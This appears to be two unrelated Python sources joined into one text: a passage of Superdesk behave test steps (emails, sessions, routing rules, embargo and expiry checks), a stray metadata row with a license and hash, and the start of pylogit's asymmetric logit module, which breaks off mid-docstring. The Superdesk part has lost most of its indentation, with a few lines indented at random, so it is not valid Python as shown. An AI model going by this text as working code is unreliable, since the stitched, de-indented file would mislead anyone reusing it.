step_impl_when_post_url(context, url)
assert len(outbox) == 1
assert_equal(outbox[0].subject, "You were mentioned in a comment by test_user")
email_text = outbox[0].body
assert email_text
@when('we change user status to "{status}" using "{url}"')
def we_change_user_status(context, status, url):
with context.app.mail.record_messages() as outbox:
step_impl_when_patch_url(context, url)
assert len(outbox) == 1
assert_equal(outbox[0].subject, "Your Superdesk account is " + status)
assert outbox[0].body
@when('we get the default incoming stage')
def we_get_default_incoming_stage(context):
data = json.loads(context.response.get_data())
incoming_stage = data['_items'][0]['incoming_stage'] if '_items' in data else data['incoming_stage']
assert incoming_stage
url = 'stages/{0}'.format(incoming_stage)
when_we_get_url(context, url)
assert_200(context.response)
data = json.loads(context.response.get_data())
assert data['default_incoming'] is True
assert data['name'] == 'Incoming Stage'
@then('we get stage filled in to default_incoming')
def we_get_stage_filled_in(context):
data = json.loads(context.response.get_data())
assert data['task']['stage']
@given('we have sessions "{url}"')
def we_have_sessions_get_id(context, url):
when_we_get_url(context, url)
item = json.loads(context.response.get_data())
context.session_id = item['_items'][0]['_id']
context.data = item
set_placeholder(context, 'SESSION_ID', item['_items'][0]['_id'])
setattr(context, 'users', item['_items'][0]['user'])
@then('we get session by id')
def we_get_session_by_id(context):
url = 'sessions/' + context.session_id
when_we_get_url(context, url)
item = json.loads(context.response.get_data())
returned_id = item["_id"]
assert context.session_id == returned_id
@then('we delete session by id')
def we_delete_session_by_id(context):
url = 'sessions/' + context.session_id
step_impl_when_delete_url(context, url)
assert_200(context.response)
@when('we create a new user')
def step_create_a_user(context):
data = apply_placeholders(context, context.text)
with context.app.mail.record_messages() as outbox:
context.response = context.client.post(get_prefixed_url(context.app, '/users'),
data=data, headers=context.headers)
expect_status_in(context.response, (200, 201))
assert len(outbox) == 1
context.email = outbox[0]
@then('we get activation email')
def step_get_activation_email(context):
assert context.email.subject == 'Superdesk account created'
email_text = context.email.body
words = email_text.split()
url = urlparse(words[words.index("to") + 1])
token = url.fragment.split('token=')[-1]
assert token
@then('we set elastic limit')
def step_set_limit(context):
context.app.settings['MAX_SEARCH_DEPTH'] = 1
@then('we get emails')
def step_we_get_email(context):
data = json.loads(context.text)
for email in data:
assert check_if_email_sent(context, email)
@then('we get {count} emails')
def step_we_get_no_email(context, count):
assert len(context.outbox) == int(count)
if context.text:
step_we_get_email(context)
def check_if_email_sent(context, spec):
if context.outbox:
for key in spec:
found = False
values = [getattr(email, key) for email in context.outbox]
for value in values:
if spec[key] in value:
found = True
if not found:
print('%s:%s not found in %s' % (key, spec[key], json.dumps(values, indent=2)))
return False
return True
print('no email sent')
return False
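# Example spec for check_if_email_sent (hypothetical): {"subject": "Item published",
# "body": "slugline"} passes when some recorded email contains "Item published" in
# its subject and "slugline" somewhere in its body.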
@then('we get activity')
def then_we_get_activity(context):
url = apply_placeholders(context, '/activity?where={"name": {"$in": ["notify", "user:mention" , "desk:mention"]}}')
context.response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
if context.response.status_code == 200:
expect_json_length(context.response, 1, path='_items')
item = json.loads(context.response.get_data())
item = item['_items'][0]
if item.get('_id'):
setattr(context, 'activity', item)
set_placeholder(context, 'USERS_ID', item['user'])
def login_as(context, username, password, user_type):
    user = {'username': username, 'password': password, 'is_active': True,
            'is_enabled': True, 'needs_activation': False, 'user_type': user_type}
if context.text:
user.update(json.loads(context.text))
tests.setup_auth_user(context, user)
@given('we login as user "{username}" with password "{password}" and user type "{user_type}"')
def given_we_login_as_user(context, username, password, user_type):
login_as(context, username, password, user_type)
@when('we login as user "{username}" with password "{password}" and user type "{user_type}"')
def when_we_login_as_user(context, username, password, user_type):
login_as(context, username, password, user_type)
def is_user_resource(resource):
return resource in ('users', '/users')
@then('we get {no_of_stages} invisible stages')
def when_we_get_invisible_stages(context, no_of_stages):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
stages = get_resource_service('stages').get_stages_by_visibility(is_visible=False)
assert len(stages) == int(no_of_stages)
@then('we get {no_of_stages} visible stages')
def when_we_get_visible_stages(context, no_of_stages):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
stages = get_resource_service('stages').get_stages_by_visibility(is_visible=True)
assert len(stages) == int(no_of_stages)
@then('we get {no_of_stages} invisible stages for user')
def when_we_get_invisible_stages_for_user(context, no_of_stages):
data = json.loads(apply_placeholders(context, context.text))
with context.app.test_request_context(context.app.config['URL_PREFIX']):
stages = get_resource_service('users').get_invisible_stages(data['user'])
assert len(stages) == int(no_of_stages)
@then('we get "{field_name}" populated')
def then_field_is_populated(context, field_name):
resp = parse_json_response(context.response)
assert resp[field_name].get('user', None) is not None, 'item is not populated'
@then('we get "{field_name}" not populated')
def then_field_is_not_populated(context, field_name):
resp = parse_json_response(context.response)
    assert resp[field_name] is None, 'item is populated'
@then('the field "{field_name}" value is not "{field_value}"')
def then_field_value_is_not_same(context, field_name, field_value):
resp = parse_json_response(context.response)
assert resp[field_name] != field_value, 'values are the same'
@then('we get "{field_name}" not populated in results')
def then_field_is_not_populated_in_results(context, field_name):
resps = parse_json_response(context.response)
for resp in resps['_items']:
        assert resp[field_name] is None, 'item is populated'
@when('we delete content filter "{name}"')
def step_delete_content_filter(context, name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
filter = get_resource_service('content_filters').find_one(req=None, name=name)
url = '/content_filters/{}'.format(filter['_id'])
headers = if_match(context, filter.get('_etag'))
context.response = context.client.delete(get_prefixed_url(context.app, url), headers=headers)
@when('we rewrite "{item_id}"')
def step_impl_when_rewrite(context, item_id):
context_data = {}
_id = apply_placeholders(context, item_id)
if context.text:
context_data.update(json.loads(apply_placeholders(context, context.text)))
data = json.dumps(context_data)
context.response = context.client.post(
get_prefixed_url(context.app, '/archive/{}/rewrite'.format(_id)),
data=data, headers=context.headers)
if context.response.status_code == 400:
return
resp = parse_json_response(context.response)
set_placeholder(context, 'REWRITE_OF', _id)
set_placeholder(context, 'REWRITE_ID', resp['_id'])
@then('we get "{field_name}" does not exist')
def then_field_does_not_exist(context, field_name):
resps = parse_json_response(context.response)
if '_items' in resps:
for resp in resps['_items']:
assert field_name not in resp, 'field exists'
else:
assert field_name not in resps, 'field exists'
@then('we get "{field_name}" does exist')
def then_field_does_exist(context, field_name):
resps = parse_json_response(context.response)
for resp in resps['_items']:
assert field_name in resp, 'field does not exist'
@when('we publish "{item_id}" with "{pub_type}" type and "{state}" state')
def step_impl_when_publish_url(context, item_id, pub_type, state):
item_id = apply_placeholders(context, item_id)
res = get_res('/archive/' + item_id, context)
headers = if_match(context, res.get('_etag'))
context_data = {"state": state}
if context.text:
data = apply_placeholders(context, context.text)
context_data.update(json.loads(data))
data = json.dumps(context_data)
context.response = context.client.patch(get_prefixed_url(context.app, '/archive/{}/{}'.format(pub_type, item_id)),
data=data, headers=headers)
store_placeholder(context, 'archive_{}'.format(pub_type))
@then('the ingest item is routed based on routing scheme and rule "{rule_name}"')
def then_ingest_item_is_routed_based_on_routing_scheme(context, rule_name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
validate_routed_item(context, rule_name, True)
@then('the ingest item is routed and transformed based on routing scheme and rule "{rule_name}"')
def then_ingest_item_is_routed_transformed_based_on_routing_scheme(context, rule_name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
validate_routed_item(context, rule_name, True, True)
@then('the ingest item is not routed based on routing scheme and rule "{rule_name}"')
def then_ingest_item_is_not_routed_based_on_routing_scheme(context, rule_name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
validate_routed_item(context, rule_name, False)
def validate_routed_item(context, rule_name, is_routed, is_transformed=False):
data = json.loads(apply_placeholders(context, context.text))
def validate_rule(action, state):
for destination in rule.get('actions', {}).get(action, []):
query = {
'and': [
{'term': {'ingest_id': str(data['ingest'])}},
{'term': {'task.desk': str(destination['desk'])}},
{'term': {'task.stage': str(destination['stage'])}},
{'term': {'state': state}}
]
}
item = get_archive_items(query) + get_published_items(query)
if is_routed:
assert len(item) > 0, 'No routed items found for criteria: ' + str(query)
assert item[0]['ingest_id'] == data['ingest']
assert item[0]['task']['desk'] == str(destination['desk'])
assert item[0]['task']['stage'] == str(destination['stage'])
assert item[0]['state'] == state
if is_transformed:
assert item[0]['abstract'] == 'Abstract has been updated'
assert_items_in_package(item[0], state, str(destination['desk']), str(destination['stage']))
else:
assert len(item) == 0
scheme = get_resource_service('routing_schemes').find_one(_id=data['routing_scheme'], req=None)
rule = next((rule for rule in scheme['rules'] if rule['name'].lower() == rule_name.lower()), {})
validate_rule('fetch', 'routed')
validate_rule('publish', 'published')
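# Illustrative sketch (not part of the original steps): a hypothetical feature-file
# snippet showing how the routing-validation steps above are meant to be used. The
# rule name and placeholder ids below are assumptions for exposition only; the step
# expects context.text to carry a JSON payload with "ingest" and "routing_scheme"
# keys, which validate_routed_item reads.
#
#   Then the ingest item is routed based on routing scheme and rule "Sports Rule"
#   """
#   {"ingest": "#INGEST_ID#", "routing_scheme": "#routing_schemes._id#"}
#   """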
@when('we schedule the routing scheme "{scheme_id}"')
def when_we_schedule_the_routing_scheme(context, scheme_id):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
scheme_id = apply_placeholders(context, scheme_id)
url = apply_placeholders(context, 'routing_schemes/%s' % scheme_id)
res = get_res(url, context)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
rule = res.get('rules')[0]
now = utcnow()
from apps.rules.routing_rules import Weekdays
rule['schedule'] = {
'day_of_week': [
Weekdays.dayname(now + timedelta(days=1)),
Weekdays.dayname(now + timedelta(days=2))
],
'hour_of_day_from': '16:00:00',
'hour_of_day_to': '20:00:00'
}
if len(res.get('rules')) > 1:
rule = res.get('rules')[1]
rule['schedule'] = {
'day_of_week': [Weekdays.dayname(now)]
}
context.response = context.client.patch(get_prefixed_url(context.app, href),
data=json.dumps({'rules': res.get('rules', [])}),
headers=headers)
assert_200(context.response)
def get_archive_items(query):
req = ParsedRequest()
req.max_results = 100
req.args = {'filter': json.dumps(query)}
return list(get_resource_service('archive').get(lookup=None, req=req))
def get_published_items(query):
req = ParsedRequest()
req.max_results = 100
req.args = {'filter': json.dumps(query)}
return list(get_resource_service('published').get(lookup=None, req=req))
def assert_items_in_package(item, state, desk, stage):
if item.get('groups'):
terms = [{'term': {'_id': ref.get('residRef')}}
for ref in [ref for group in item.get('groups', [])
for ref in group.get('refs', []) if 'residRef' in ref]]
query = {'or': terms}
items = get_archive_items(query)
assert len(items) == len(terms)
for item in items:
assert item.get('state') == state
assert item.get('task', {}).get('desk') == desk
assert item.get('task', {}).get('stage') == stage
@given('I logout')
def logout(context):
we_have_sessions_get_id(context, '/sessions')
step_impl_when_delete_url(context, '/auth_db/{}'.format(context.session_id))
assert_200(context.response)
@then('we get "{url}" and match')
def we_get_and_match(context, url):
url = apply_placeholders(context, url)
response_data = get_res(url, context)
context_data = json.loads(apply_placeholders(context, context.text))
assert_equal(json_match(context_data, response_data), True,
msg=str(context_data) + '\n != \n' + str(response_data))
@then('there is no "{key}" in response')
def there_is_no_key_in_response(context, key):
data = get_json_data(context.response)
assert key not in data, 'key "%s" is in %s' % (key, data)
@then('there is no "{key}" in task')
def there_is_no_key_in_preferences(context, key):
data = get_json_data(context.response)['task']
assert key not in data, 'key "%s" is in task' % key
@then('there is no "{key}" in data')
def there_is_no_profile_in_data(context, key):
data = get_json_data(context.response)['_items'][0]['data']
assert key not in data, 'key "%s" is in data' % key
@then('broadcast "{key}" has value "{value}"')
def broadcast_key_has_value(context, key, value):
data = get_json_data(context.response).get('broadcast', {})
value = apply_placeholders(context, value)
if value.lower() == 'none':
assert data[key] is None, 'key "%s" is not none and has value "%s"' % (key, data[key])
else:
assert data[key] == value, 'key "%s" does not have valid value "%s"' % (key, data[key])
@then('there is no "{key}" preference')
def there_is_no_preference(context, key):
data = get_json_data(context.response)
assert key not in data['user_preferences'], '%s is in %s' % (key, data['user_preferences'].keys())
@then('there is no "{key}" in "{namespace}" preferences')
def there_is_no_key_in_namespace_preferences(context, key, namespace):
data = get_json_data(context.response)['user_preferences']
assert key not in data[namespace], 'key "%s" is in %s' % (key, data[namespace])
@then('we check if article has Embargo')
def step_impl_then_check_embargo(context):
assert_200(context.response)
try:
response_data = json.loads(context.response.get_data())
except Exception:
fail_and_print_body(context.response, 'response is not valid json')
if response_data.get('_meta') and response_data.get('_items'):
for item in response_data.get('_items'):
assert_embargo(context, item)
else:
assert_embargo(context, response_data)
def assert_embargo(context, item):
if not item.get('embargo'):
        fail_and_print_body(context.response, 'Embargo not found')
@when('embargo lapses for "{item_id}"')
def embargo_lapses(context, item_id):
item_id = apply_placeholders(context, item_id)
item = get_res("/archive/%s" % item_id, context)
updates = {'embargo': (utcnow() - timedelta(minutes=10)),
'schedule_settings': {'utc_embargo': (utcnow() - timedelta(minutes=10))}}
with context.app.test_request_context(context.app.config['URL_PREFIX']):
get_resource_service('archive').system_update(id=item['_id'], original=item, updates=updates)
@then('we validate the published item expiry to be after publish expiry set in desk settings {publish_expiry_in_desk}')
def validate_published_item_expiry(context, publish_expiry_in_desk):
assert_200(context.response)
try:
response_data = json.loads(context.response.get_data())
except Exception:
fail_and_print_body(context.response, 'response is not valid json')
if response_data.get('_meta') and response_data.get('_items'):
for item in response_data.get('_items'):
assert_expiry(item, publish_expiry_in_desk)
else:
assert_expiry(response_data, publish_expiry_in_desk)
@then('we get updated timestamp "{field}"')
def step_we_get_updated_timestamp(context, field):
data = get_json_data(context.response)
timestamp = arrow.get(data[field])
now = utcnow()
assert timestamp + timedelta(seconds=5) > now, 'timestamp < now (%s, %s)' % (timestamp, now) # 5s tolerance
def assert_expiry(item, publish_expiry_in_desk):
embargo = item.get('embargo')
actual = parse_date(item.get('expiry'))
error_message = 'Published Item Expiry validation fails'
publish_expiry_in_desk = int(publish_expiry_in_desk)
if embargo:
expected = get_expiry_date(minutes=publish_expiry_in_desk,
offset=datetime.strptime(embargo, '%Y-%m-%dT%H:%M:%S%z'))
if actual != expected:
raise WooperAssertionError("{}. Expected: {}, Actual: {}".format(error_message, expected, actual))
else:
expected = get_expiry_date(minutes=publish_expiry_in_desk)
if expected < actual:
raise WooperAssertionError("{}. Expected: {}, Actual: {}".format(error_message, expected, actual))
@when('run import legal publish queue')
def run_import_legal_publish_queue(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
from apps.legal_archive import ImportLegalPublishQueueCommand
ImportLegalPublishQueueCommand().run()
@when('we expire items')
def expire_content(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
ids = json.loads(apply_placeholders(context, context.text))
expiry = utcnow() - timedelta(minutes=5)
for item_id in ids:
original = get_resource_service('archive').find_one(req=None, _id=item_id)
get_resource_service('archive').system_update(item_id, {'expiry': expiry}, original)
get_resource_service('published').update_published_items(item_id, 'expiry', expiry)
from apps.archive.commands import RemoveExpiredContent
RemoveExpiredContent().run()
@when('the publish schedule lapses')
def run_overdue_schedule_jobs(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
ids = json.loads(apply_placeholders(context, context.text))
lapse_time = utcnow() - timedelta(minutes=5)
updates = {
'publish_schedule': lapse_time,
'schedule_settings': {
'utc_publish_schedule': lapse_time,
'time_zone': None
}
}
for item_id in ids:
original = get_resource_service('archive').find_one(req=None, _id=item_id)
get_resource_service('archive').system_update(item_id, updates, original)
get_resource_service('published').update_published_items(item_id, 'publish_schedule', lapse_time)
get_resource_service('published').update_published_items(item_id, 'schedule_settings.utc_publish_schedule',
lapse_time)
@when('we transmit items')
def transmit_items(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
from superdesk.publish.publish_content import PublishContent
PublishContent().run()
@when('we remove item "{_id}" from mongo')
def remove_item_from_mongo(context, _id):
with context.app.app_context():
context.app.data.mongo.remove('archive', {'_id': _id})
@then('we get text "{text}" in response field "{field}"')
def we_get_text_in_field(context, text, field):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
resp = parse_json_response(context.response)
assert field in resp, 'Field {} not found in response.'.format(field)
assert isinstance(resp.get(field), str), 'Invalid type'
assert text in resp.get(field, ''), '{} contains text: {}. Text To find: {}'.format(field,
resp.get(field, ''),
text)
@then('we reset priority flag for updated articles')
def we_get_reset_default_priority_for_updated_articles(context):
context.app.config['RESET_PRIORITY_VALUE_FOR_UPDATE_ARTICLES'] = True
@then('we mark the items not moved to legal')
def we_mark_the_items_not_moved_to_legal(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
ids = json.loads(apply_placeholders(context, context.text))
for item_id in ids:
get_resource_service('published').update_published_items(item_id, 'moved_to_legal', False)
@when('we run import legal archive command')
def we_run_import_legal_archive_command(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
from apps.legal_archive.commands import ImportLegalArchiveCommand
ImportLegalArchiveCommand().run()
@then('we find no reference of package "{reference}" in item')
def we_find_no_reference_of_package_in_item(context, reference):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
reference = apply_placeholders(context, reference)
resp = parse_json_response(context.response)
linked_in_packages = resp.get('linked_in_packages', [])
assert reference not in [p.get('package') for p in linked_in_packages], \
'Package reference {} found in item'.format(reference)
@then('we set spike exipry "{expiry}"')
def we_set_spike_exipry(context, expiry):
context.app.settings['SPIKE_EXPIRY_MINUTES'] = int(expiry)
@then('we set published item expiry {expiry}')
def we_set_published_item_expiry(context, expiry):
context.app.settings['PUBLISHED_CONTENT_EXPIRY_MINUTES'] = int(expiry)
@then('we set copy metadata from parent flag')
def we_set_copy_metadata_from_parent(context):
context.app.settings['COPY_METADATA_FROM_PARENT'] = True
@then('we assert the content api item "{item_id}" is published to subscriber "{subscriber}"')
def we_assert_content_api_item_is_published_to_subscriber(context, item_id, subscriber):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
subscriber = apply_placeholders(context, subscriber)
req = ParsedRequest()
req.projection = json.dumps({'subscribers': 1})
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
subscriber = apply_placeholders(context, subscriber)
assert len(item.get('subscribers', [])) > 0, 'No subscribers found.'
assert subscriber in item.get('subscribers', []), 'Subscriber with Id: {} not found.'.format(subscriber)
@then('we assert the content api item "{item_id}" is not published to subscriber "{subscriber}"')
def we_assert_content_api_item_is_not_published_to_subscriber(context, item_id, subscriber):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
subscriber = apply_placeholders(context, subscriber)
req = ParsedRequest()
req.projection = json.dumps({'subscribers': 1})
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
subscriber = apply_placeholders(context, subscriber)
assert subscriber not in item.get('subscribers', []), \
'Subscriber with Id: {} found for the item. '.format(subscriber)
@then('we assert the content api item "{item_id}" is not published to any subscribers')
def we_assert_content_api_item_is_not_published(context, item_id):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
req = ParsedRequest()
req.projection = json.dumps({'subscribers': 1})
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
assert len(item.get('subscribers', [])) == 0, \
'Item published to subscribers {}.'.format(item.get('subscribers', []))
@then('we ensure that archived schema extra fields are not present in duplicated item')
def we_ensure_that_archived_schema_extra_fields_are_not_present(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
eve_keys = set([config.ID_FIELD, config.LAST_UPDATED, config.DATE_CREATED, config.VERSION, config.ETAG])
archived_schema_keys = set(context.app.config['DOMAIN']['archived']['schema'].keys())
        archived_schema_keys |= eve_keys
        archive_schema_keys = set(context.app.config['DOMAIN']['archive']['schema'].keys())
        archive_schema_keys |= eve_keys
extra_fields = [key for key in archived_schema_keys if key not in archive_schema_keys]
duplicate_item = json.loads(context.response.get_data())
for field in extra_fields:
            assert field not in duplicate_item, 'Field {} found in the duplicate item'.format(field)
@then('we assert content api item "{item_id}" with associated item "{embedded_id}" is published to "{subscriber}"')
def we_assert_that_associated_item_for_subscriber(context, item_id, embedded_id, subscriber):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
subscriber = apply_placeholders(context, subscriber)
embedded_id = apply_placeholders(context, embedded_id)
req = ParsedRequest()
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
assert embedded_id in (item.get('associations') or {}), '{} association not found.'.format(embedded_id)
assert subscriber in (item['associations'][embedded_id] or {}).get('subscribers', []), \
'{} subscriber not found in associations {}'.format(subscriber, embedded_id)
@then('we assert content api item "{item_id}" with associated item "{embedded_id}" is not published to "{subscriber}"')
def we_assert_that_associated_item_not_for_subscriber(context, item_id, embedded_id, subscriber):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
subscriber = apply_placeholders(context, subscriber)
embedded_id = apply_placeholders(context, embedded_id)
req = ParsedRequest()
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
assert embedded_id in (item.get('associations') or {}), '{} association not found.'.format(embedded_id)
assert subscriber not in (item['associations'][embedded_id] or {}).get('subscribers', []), \
'{} subscriber found in associations {}'.format(subscriber, embedded_id)
@then('file exists "{path}"')
def then_file_exists(context, path):
assert os.path.isfile(path), '{} is not a file'.format(path)
|
agpl-3.0
| -117,397,680,062,153,810 | 38.317652 | 120 | 0.64768 | false |
timothyb0912/pylogit
|
src/pylogit/asym_logit.py
|
1
|
50536
|
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 28 20:16:35 2016
@name: MultiNomial Asymmetric Logit--version 3
@author: Timothy Brathwaite
@summary: Contains functions necessary for estimating multinomial asymmetric
logit models (with the help of the "base_multinomial_cm.py" file)
@notes: Differs from version 1 by how it defines the transformation for
v_n < 0. Instead of ln(1-c_j), this file uses ln((1 - c_j)/ (J-1)).
Differs from version 2 in how it partitions the vector of
parameters to be estimated, using
theta = (shape | intercept | beta) instead of
theta = (shape | beta).
"""
from __future__ import absolute_import
from functools import partial
import warnings
import numpy as np
from scipy.sparse import diags
from . import choice_calcs as cc
from . import base_multinomial_cm_v2 as base_mcm
from .estimation import LogitTypeEstimator
from .estimation import estimate
from .display_names import model_type_to_display_name as display_name_dict
try:
# in Python 3 range returns an iterator instead of list
# to maintain backwards compatibility use "old" version of range
from past.builtins import range
except ImportError:
pass
# Define the boundary values which are not to be exceeded during computation
max_comp_value = 1e300
min_comp_value = 1e-300
max_exp = 700
min_exp = -700
# Alias necessary functions from the base multinomial choice model module
general_log_likelihood = cc.calc_log_likelihood
general_gradient = cc.calc_gradient
general_calc_probabilities = cc.calc_probabilities
general_hessian = cc.calc_hessian
# Create a warning string that will be issued if ridge regression is performed.
_msg = "NOTE: An L2-penalized regression is being performed. The "
_msg_2 = "reported standard errors and robust standard errors "
_msg_3 = "***WILL BE INCORRECT***."
_ridge_warning_msg = _msg + _msg_2 + _msg_3
# Create a warning that tells users to pass the shape_ref_pos keyword argument.
_msg_4 = "shape_ref_pos must be an integer. It is not an optional "
_msg_5 = "parameter for the asymmetric logit model. All shape "
_msg_6 = "parameters are not identified."
_shape_ref_msg = _msg_4 + _msg_5 + _msg_6
def split_param_vec(param_vec, rows_to_alts, design, return_all_types=False):
"""
Parameters
----------
param_vec : 1D ndarray.
Should have as many elements as there are parameters being estimated.
rows_to_alts : 2D scipy sparse matrix.
There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
design : 2D ndarray.
There should be one row per observation per available alternative.
There should be one column per utility coefficient being estimated. All
elements should be ints, floats, or longs.
return_all_types : bool, optional.
Determines whether or not a tuple of 4 elements will be returned (with
one element for the nest, shape, intercept, and index parameters for
this model). If False, a tuple of 3 elements will be returned, as
described below.
Returns
-------
tuple of three 1D ndarrays.
The first element will be an array of the shape parameters for this
model. The second element will either be an array of the "outside"
intercept parameters for this model or None. The third element will be
an array of the index coefficients for this model.
Note
----
If `return_all_types == True` then the function will return a tuple of four
    objects. In order, these objects will either be None or the arrays
    corresponding to the nest, shape, intercept, and index parameters.
"""
# Figure out how many shape parameters we should have for the model
num_shapes = rows_to_alts.shape[1] - 1
# Figure out how many parameters are in the index
num_index_coefs = design.shape[1]
# Isolate the initial shape parameters from the betas
shapes = param_vec[:num_shapes]
betas = param_vec[-1 * num_index_coefs:]
# Get the remaining outside intercepts if there are any
remaining_idx = param_vec.shape[0] - (num_shapes + num_index_coefs)
if remaining_idx > 0:
intercepts = param_vec[num_shapes: num_shapes + remaining_idx]
else:
intercepts = None
if return_all_types:
return None, shapes, intercepts, betas
else:
return shapes, intercepts, betas
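# Illustrative sketch (added for exposition, not part of the original module): a
# tiny, self-contained check of how split_param_vec partitions a stacked parameter
# vector. The toy sizes (4 alternatives, 2 index coefficients) are assumptions
# chosen only for this example; the function is never called at import time.
def _example_split_param_vec():
    import numpy as np
    from scipy.sparse import csr_matrix
    toy_rows_to_alts = csr_matrix(np.eye(4))   # 4 rows mapping to 4 alternatives
    toy_design = np.ones((4, 2))               # 2 index coefficients
    toy_params = np.arange(8.0)                # 3 shapes + 3 intercepts + 2 betas
    shapes, intercepts, betas = split_param_vec(toy_params, toy_rows_to_alts, toy_design)
    # shapes -> [0., 1., 2.], intercepts -> [3., 4., 5.], betas -> [6., 7.]
    return shapes, intercepts, betas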
def _convert_eta_to_c(eta, ref_position):
"""
Parameters
----------
eta : 1D or 2D ndarray.
The elements of the array should be this model's 'transformed' shape
parameters, i.e. the natural log of (the corresponding shape parameter
divided by the reference shape parameter). This array's elements will
be real valued. If `eta` is 2D, then its shape should be
(num_estimated_shapes, num_parameter_samples).
ref_position : int.
Specifies the position in the resulting array of shape ==
`(eta.shape[0] + 1,)` that should be equal to 1 - the sum of the other
elements in the resulting array.
Returns
-------
c_vector : 1D or 2D ndarray based on `eta`.
If `eta` is 1D then `c_vector` should have shape
`(eta.shape[0] + 1, )`. If `eta` is 2D then `c_vector` should have
shape `(eta.shape[0] + 1, eta.shape[1])`. The returned array will
contains the 'natural' shape parameters that correspond to `eta`.
"""
# Exponentiate eta
exp_eta = np.exp(eta)
# Guard against overflow
exp_eta[np.isposinf(exp_eta)] = max_comp_value
# Guard against underflow
exp_eta[exp_eta == 0] = min_comp_value
# Calculate the denominator in a logistic transformation
# Note the +1 is for the reference alternative which has been
# constrained so that its corresponding eta = 0 and exp(0) = 1
denom = exp_eta.sum(axis=0) + 1
# Get a list of all the indices (or row indices) corresponding to the
# alternatives whose shape parameters are being estimated.
replace_list = list(range(eta.shape[0] + 1))
replace_list.remove(ref_position)
# Initialize an array for the vector of shape parameters, c
if len(eta.shape) > 1 and eta.shape[1] > 1:
# Get an array of zeros with shape
# (num_possible_alternatives, num_parameter_samples). This is used when
# working with samples from a Bayesian posterior distribution
c_vector = np.zeros((eta.shape[0] + 1,
eta.shape[1]))
# Calculate the natural shape parameters
c_vector[replace_list, :] = exp_eta / denom
c_vector[ref_position, :] = 1.0 / denom
else:
# Get an array of zeros with shape (num_possible_alternatives,)
c_vector = np.zeros(eta.shape[0] + 1)
# Calculate the natural shape parameters
c_vector[replace_list] = exp_eta / denom
c_vector[ref_position] = 1.0 / denom
return c_vector
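# Illustrative sketch (added for exposition, not part of the original module): a
# small worked example of the eta -> c mapping above. With three alternatives,
# ref_position=0, and eta = [0, 0], every exp(eta_j) equals 1, the denominator is
# 1 + 1 + 1 = 3, and all three natural shape parameters come out as 1/3. The
# numbers are assumptions chosen only to make the logistic transform concrete.
def _example_convert_eta_to_c():
    import numpy as np
    toy_eta = np.zeros(2)   # two estimated (transformed) shape parameters
    c_vector = _convert_eta_to_c(toy_eta, ref_position=0)
    # c_vector -> [1/3, 1/3, 1/3]; the entries are positive and sum to one.
    return c_vector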
def _calc_deriv_c_with_respect_to_eta(natural_shapes,
ref_position,
output_array=None):
"""
Parameters
----------
natural_shapes : 1D ndarray.
Should have one element per available alternative in the dataset whose
choice situations are being modeled. Should have at least
`ref_position` elements in it.
ref_position : int.
Specifies the position in the array of natural shape parameters that
should be equal to 1 - the sum of the other elements. Specifies the
alternative in the ordered array of unique alternatives that is not
having its shape parameter estimated (in order to ensure
identifiability).
output_array : 2D ndarray.
This array is to have its data overwritten with the correct derivatives
of the natural shape parameters with respect to transformed shape
parameters. Should have shape ==
`(natural_shapes.shape[0], natural_shapes.shape[0] - 1)`.
Returns
-------
output_array : 2D ndarray.
Has shape == (natural_shapes.shape[0], natural_shapes.shape[0] - 1).
Will contain the derivative of the shape parameters, with
respect to the underlying 'transformed' shape parameters.
"""
# Generate a list of the indices which indicate the columns to be
# selected from a 2D numpy array of
# np.diag(natural_shapes) - np.outer(natural_shapes, natural_shapes)
    columns_to_be_kept = list(range(natural_shapes.shape[0]))
    columns_to_be_kept.remove(ref_position)
# Calculate and store the derivative of the natural shape parameters
# with respect to the reduced shape parameters.
output_array[:, :] = (np.diag(natural_shapes) -
np.outer(natural_shapes,
natural_shapes))[:, columns_to_be_kept]
return output_array
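# Note: the array filled above is the Jacobian of the logistic (softmax-style)
# transform, diag(c) - c c^T, with the column belonging to the reference
# alternative dropped because that shape parameter is not estimated directly.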
def _asym_utility_transform(systematic_utilities,
alt_IDs,
rows_to_alts,
eta,
intercept_params,
shape_ref_position=None,
intercept_ref_pos=None,
*args, **kwargs):
"""
Parameters
----------
systematic_utilities : 1D ndarray.
        Contains the systematic utilities for each available alternative
        for each observation. All elements should be ints, floats, or longs.
    alt_IDs : 1D ndarray.
        All elements should be ints. There should be one row per observation per
available alternative for the given observation. Elements denote the
alternative corresponding to the given row of the design matrix.
rows_to_alts : 2D ndarray.
